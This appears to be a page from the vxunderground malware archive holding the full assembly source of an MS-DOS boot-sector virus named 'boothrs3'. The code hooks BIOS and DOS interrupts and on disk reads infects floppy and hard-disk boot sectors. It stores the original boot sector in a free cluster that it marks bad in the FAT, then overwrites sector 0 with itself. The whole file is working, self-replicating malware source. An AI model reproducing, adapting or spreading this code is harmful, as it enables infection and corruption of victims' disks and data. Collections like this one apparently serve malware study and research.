MalwareSourceCode/MSDOS/B-Index/Virus.MSDOS.Unknown.boothrs3.asm
vxunderground 4b9382ddbc re-organize
push
2022-08-21 04:07:57 -05:00

434 lines
6.4 KiB
NASM
Raw Permalink Blame History

This file contains invisible Unicode characters

This file contains invisible Unicode characters that are indistinguishable to humans but may be processed differently by a computer. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

.radix 16
start:
jmp begin
db 'IBM 3.3'
dw 200
db 2
dw 1
db 2
dw 70
dw 2D0
db 0FDh
dw 2
dw 9
dw 2
dw 0
work dd ?
count db ?
drive db ?
Fat_sec dw ?
old_boot dw 666d
flag db ?
sys_sec dw ?
;Simulate PUSHA
pusha:
pop word ptr cs:[sys_sec-start]
pushf
push ax
push bx
push cx
push dx
push si
push di
push bp
push ds
push es
jmp word ptr cs:[sys_sec-start]
;Simulate POPA
popa:
pop word ptr cs:[sys_sec-start]
pop es
pop ds
pop bp
pop di
pop si
pop dx
pop cx
pop bx
pop ax
popf
jmp word ptr cs:[sys_sec-start]
;This procedure Reads/Writes the absolute sector in BX
;ES:BP must point I/O buffer
write:
mov ah,3
jmp short do_it
read:
mov ah,2
do_it:
mov al,1
xchg ax,bx
add ax,[001C] ;Hidden sectors
xor dx,dx
div word ptr [0018]
inc dl ;Adjust dl because BIOS counts sectors from 1 (not from 0)
mov ch,dl ;dl is the first sector
xor dx,dx
div word ptr [001A] ;Cylinder in AX
mov cl,6 ;Set CX if cylinder is bigger than 512
shl ah,cl
or ah,ch
xchg ax,cx
xchg ch,cl
xchg dh,dl
xchg ax,bx
abs_read:
xchg bx,bp
mov dl,byte ptr [drive-start] ;dl is the drive
pushf
db 9A
orig dd ?
jnc ok_func
pop ax
ok_func:
ret
begin:
xor ax,ax ;Virus begining
mov bp,7C00
mov ds,ax ;Clear ds&ss
mov ss,ax
mov sp,bp ;Set SP bellow virus
xchg ax,di
mov si,bp
mov ax,2000 ;Copy virus somewhere in memory
mov es,ax
mov cx,0100
rep movsw
push es
mov ax,offset here-start
push ax
retf ;go there
here:
mov ax,1234
cmp [80*4],ax
mov [80*4],ax
je skip_this
les bx,[1C*4] ;Get old int 1Ch value
mov cs:[work-start],bx
mov cs:[work-start+2],es
mov [1C*4],offset entry_1C-start ;Set new value
mov [1C*4+2],cs
skip_this:
les bx,[13*4] ;Save original int 13h
mov cs:[orig-start],bx
mov cs:[orig-start+2],es
push cs ;DS=ES=CS
push cs
pop ds
pop es
again:
mov ax,offset again-start
push ax
xor ah,ah ;Initialize Floppy
mov byte ptr [flag-start],ah
int 13
and byte ptr [drive-start],80 ;Drive A: or C:
mov bx,word ptr [old_boot-start] ;Read second part
mov bp,offset second-start
call read
mov bx,word ptr [old_boot-start]
inc bx
xor ax,ax
mov es,ax
mov bp,7C00
call read ;Read old Boot
db 0EA,00,7C,00,00 ;JMP 0000:7C00
entry_1C:
push si
push ds
xor si,si
mov ds,si
cmp [si+21*4],si
je not_yet
push bx
push es
les bx,cs:[si+work-start]
mov [si+1C*4],bx
mov [si+1C*4+2],es
les bx,[si+21*4]
mov word ptr cs:[si+jmp_21-start],bx
mov word ptr cs:[si+jmp_21-start+2],es
mov [si+21*4],offset go_on-start
mov [si+21*4+2],cs
pop es
pop bx
not_yet:
pop ds
pop si
iret
go_on:
call pusha
cmp ax,4B00
je install
return:
call popa
db 0EA
jmp_21 dd ?
install:
mov ah,52
int 21
xor si,si
xor di,di
mov ds,es:[bx-02]
mov bx,ds
mov ax,[si+3]
add [si+3],96
inc bx
add ax,bx
mov es,ax
push es
mov ax,es:[si+3]
sub ax,96
push ax
mov ax,[si+3]
add ax,bx
mov ds,ax
mov byte ptr [si],'Z'
mov [si+1],si
pop [si+3]
pop es
push cs
pop ds
mov cx,0200
rep movsw
mov ax,word ptr [jmp_21-start]
mov bx,word ptr [jmp_21-start+2]
mov ds,cx
mov [21*4],ax
mov [21*4+2],bx
mov ax,[13*4]
mov bx,[13*4+2]
mov es:[my-start],ax
mov es:[my-start+2],bx
mov [13*4],offset real-start
mov [13*4+2],es
jmp short return
real:
call pusha
cmp ah,02
jne exit
cmp dl,81
ja exit
mov byte ptr cs:[drive-start],dl
check:
xor ax,ax
mov ds,ax
mov byte ptr cs:[flag-start],al
mov al,byte ptr [043F]
push dx
test dl,80
jz ok_drive
sub dl,7F
shl dx,1
shl dx,1
dec dx
ok_drive:
inc dx
test al,dl
pop dx
jnz exit
push cs
push cs
pop es
pop ds
call infect
exit:
call popa
call_cur:
db 0EA
my dd ?
ident dw 01234
dw 0AA55
second label word
db '666'
infect:
push dx
xor ah,ah
int 1A
test dl,01
pop dx
jz bad
mov ax,0201
mov dh,0
mov cx,0001
mov bp,offset buffer-start
call abs_read
test dl,80
jz usual
mov bx,offset buffer-start+01BE
mov cx,0004
search:
cmp byte ptr [bx+4],1
je okay
cmp byte ptr [bx+4],4
je okay
add bx,10
loop search
ret
okay:
mov dx,[bx]
mov cx,[bx+2]
mov ax,0201
mov bp,offset buffer-start
call abs_read
usual:
mov si,offset buffer-start+3
mov di,0003
mov cx,1Bh
rep movsb
cmp [buffer-start+01FC],1234 ;Infected ?
jne well
bad:
ret
well:
cmp [0Bh],200 ;Bytes in sector
jne bad
cmp byte ptr [0Dh],2 ;Sectors in 1 cluster
jb bad
mov cx,[0E] ;Reserved dectors
mov al,[10] ;Copies of FAT
cbw
mul word ptr [16] ;FAT in sectors
add cx,ax
mov ax,20 ;32 bytes
mul word ptr [11] ;Elements in the catalogue
mov bx,1FF
add ax,bx
inc bx
div bx
add cx,ax
mov word ptr [sys_sec-start],cx ;system sectors
mov ax,[0013] ;Sectors on the disk
sub ax,cx
mov bl,[0Dh] ;Sectors in cluster
xor dx,dx
xor bh,bh
div bx
inc ax ;AX=clusters on disk
mov di,ax
and byte ptr [flag-start],0FE
cmp ax,0FF0
jbe small
or byte ptr [flag-start],1
small:
mov si,1
mov bx,[0E] ;Where to read FAT from
dec bx
mov [Fat_sec-start],bx
mov byte ptr [count-start],0FE
look_here:
inc word ptr [Fat_sec-start] ;Next sector in FAT
mov bx,[Fat_sec-start]
add byte ptr [count-start],2 ;Adjust for new offset
mov bp,offset buffer-start ;BP points buffer
call read ;Read FAT's sector
jmp short where
look:
mov ax,3 ;Multiply by 1.5 rounded down to integer number
test byte ptr [flag-start],1
je go_1
inc ax ;For 16 bit FAT
go_1:
mul si
shr ax,1
sub ah,byte ptr [count-start] ;Adjust offset in range of 512 bytes
mov bx,ax
cmp bx,1FF ;If reached the end then load next FAT sector
jnb look_here
mov dx,[bx+buffer-start] ;Information for this cluster
test byte ptr [flag-start],01
jne go_2
test si,1
je go_3
mov cl,4
shr dx,cl
go_3:
and dh,0F
go_2:
or dx,dx ;Free cluster ?
jz found
where:
inc si
cmp si,di
jbe look
ret
found:
mov dx,0FFF7 ;Prepare for marking it as bad
test byte ptr [flag-start],1
jnz go_4
and dh,0F
test si,1
je go_4
mov cl,4
shl dx,cl
go_4:
or [bx+buffer-start],dx ;Set it in FAT
mov bx,[Fat_sec-start]
mov bp,offset buffer-start
call write ;Update 1'st FAT copy
mov ax,si ;Convert cluster address in si to sector number
sub ax,2
mov bl,byte ptr [0Dh]
xor bh,bh
mul bx
add ax,[sys_sec-start]
mov si,ax ;Si is the sector that is free
xor bx,bx
mov bp,offset buffer-start
call read ;Read old BOOTSECTOR
mov bx,si ;Put it in a quiet place
inc bx
mov bp,offset buffer-start
call write ;Do that
mov bx,si
mov [old_boot-start],si
mov bp,offset second-start
call write
xor bx,bx
xor bp,bp
call write
ret
this_ db 1024d-(this_-start) dup (0F6h)
buffer label word